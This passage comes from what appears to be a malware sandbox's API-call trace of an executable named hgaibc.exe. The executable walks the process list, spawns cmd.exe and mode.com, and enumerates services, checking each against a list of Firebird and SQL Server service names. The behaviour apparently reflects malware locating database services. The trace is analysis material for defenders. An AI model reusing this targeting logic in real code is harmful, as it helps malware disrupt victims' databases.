returned 18 [0187.321] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0187.321] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0187.321] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0187.321] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0187.321] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0187.321] lstrlenW (lpString="Themes") returned 6 [0187.321] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0187.321] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0187.321] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0187.321] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0187.321] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0187.321] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0187.321] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0187.321] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0187.321] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0187.321] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0187.322] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f0 [0187.326] Process32FirstW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.327] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0187.328] lstrlenW (lpString="System") returned 6 [0187.328] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0187.328] lstrlenW (lpString="smss.exe") returned 8 [0187.329] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.329] lstrlenW (lpString="csrss.exe") returned 9 [0187.329] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0187.330] lstrlenW (lpString="wininit.exe") returned 11 [0187.330] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.331] lstrlenW (lpString="csrss.exe") returned 9 [0187.331] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0187.332] lstrlenW (lpString="winlogon.exe") returned 12 [0187.332] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0187.333] lstrlenW (lpString="services.exe") returned 12 [0187.333] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.333] lstrlenW (lpString="lsass.exe") returned 9 [0187.333] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0187.334] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0187.334] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0187.335] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0187.335] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.336] lstrlenW (lpString="svchost.exe") returned 11 [0187.336] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.336] lstrlenW (lpString="svchost.exe") returned 11 [0187.336] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.337] lstrlenW (lpString="dwm.exe") returned 7 [0187.337] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.338] lstrlenW (lpString="svchost.exe") returned 11 [0187.338] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.338] lstrlenW (lpString="svchost.exe") returned 11 [0187.338] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.339] lstrlenW (lpString="svchost.exe") returned 11 [0187.339] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.340] lstrlenW (lpString="svchost.exe") returned 11 [0187.340] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.341] lstrlenW (lpString="svchost.exe") returned 11 [0187.341] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.341] lstrlenW (lpString="svchost.exe") returned 11 [0187.342] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.342] lstrlenW (lpString="svchost.exe") returned 11 [0187.342] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.343] lstrlenW (lpString="svchost.exe") returned 11 [0187.344] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.344] lstrlenW (lpString="svchost.exe") returned 11 [0187.344] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.345] lstrlenW (lpString="svchost.exe") returned 11 [0187.345] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.346] lstrlenW (lpString="spoolsv.exe") returned 11 [0187.346] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.347] lstrlenW (lpString="svchost.exe") returned 11 [0187.347] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0187.348] lstrlenW (lpString="audiodg.exe") returned 11 [0187.348] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0187.349] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0187.349] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0187.349] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0187.350] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0187.350] lstrlenW (lpString="Memory Compression") returned 18 [0187.350] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0187.351] lstrlenW (lpString="sihost.exe") returned 10 [0187.351] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.352] lstrlenW (lpString="svchost.exe") returned 11 [0187.352] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0187.353] lstrlenW (lpString="msoia.exe") returned 9 [0187.353] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0187.354] lstrlenW (lpString="taskhostw.exe") returned 13 [0187.354] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.355] lstrlenW (lpString="explorer.exe") returned 12 [0187.355] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0187.355] lstrlenW (lpString="SearchUI.exe") returned 12 [0187.355] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0187.356] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0187.356] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0187.357] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0187.357] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.358] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0187.358] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0187.360] lstrlenW (lpString="hgaibc.exe") returned 10 [0187.361] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0187.361] lstrlenW (lpString="cmd.exe") returned 7 [0187.361] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0187.362] lstrlenW (lpString="conhost.exe") returned 11 [0187.362] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0187.363] lstrlenW (lpString="mode.com") returned 8 [0187.363] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0187.363] CloseHandle (hObject=0x2f0) returned 1 [0187.364] Sleep (dwMilliseconds=0x1f4) [0187.874] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bf010 [0187.875] EnumServicesStatusExW (in: hSCManager=0x6bf010, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0187.875] GetLastError () returned 0xea [0187.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d87a0 [0187.876] EnumServicesStatusExW (in: hSCManager=0x6bf010, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d87a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d87a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0187.876] CloseServiceHandle (hSCObject=0x6bf010) returned 1 [0187.877] lstrlenW (lpString="Appinfo") returned 7 [0187.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0187.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0187.877] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0187.877] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0187.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0187.877] lstrlenW (lpString="AppXSvc") returned 7 [0187.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0187.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0187.877] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0187.877] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0187.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0187.877] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0187.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0187.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0187.877] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0187.877] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0187.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0187.877] lstrlenW (lpString="Audiosrv") returned 8 [0187.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0187.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0187.877] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0187.877] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0187.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0187.877] lstrlenW (lpString="BFE") returned 3 [0187.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0187.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0187.878] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0187.878] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0187.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0187.878] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0187.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0187.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0187.878] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0187.878] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0187.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0187.878] lstrlenW (lpString="CDPSvc") returned 6 [0187.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0187.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0187.878] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0187.878] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0187.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0187.878] lstrlenW (lpString="ClickToRunSvc") returned 13 [0187.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0187.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0187.878] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0187.878] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0187.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0187.878] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0187.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0187.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0187.878] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0187.878] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0187.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0187.878] lstrlenW (lpString="CryptSvc") returned 8 [0187.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0187.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0187.879] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0187.879] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0187.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0187.879] lstrlenW (lpString="DcomLaunch") returned 10 [0187.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0187.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0187.879] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0187.879] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0187.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0187.879] lstrlenW (lpString="DeviceAssociationService") returned 24 [0187.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0187.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0187.879] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0187.879] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0187.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0187.879] lstrlenW (lpString="Dhcp") returned 4 [0187.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0187.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0187.879] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0187.879] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0187.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0187.879] lstrlenW (lpString="Dnscache") returned 8 [0187.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0187.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0187.879] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0187.879] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0187.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0187.880] lstrlenW (lpString="DPS") returned 3 [0187.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0187.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0187.880] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0187.880] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0187.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0187.880] lstrlenW (lpString="DusmSvc") returned 7 [0187.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0187.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0187.880] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0187.880] 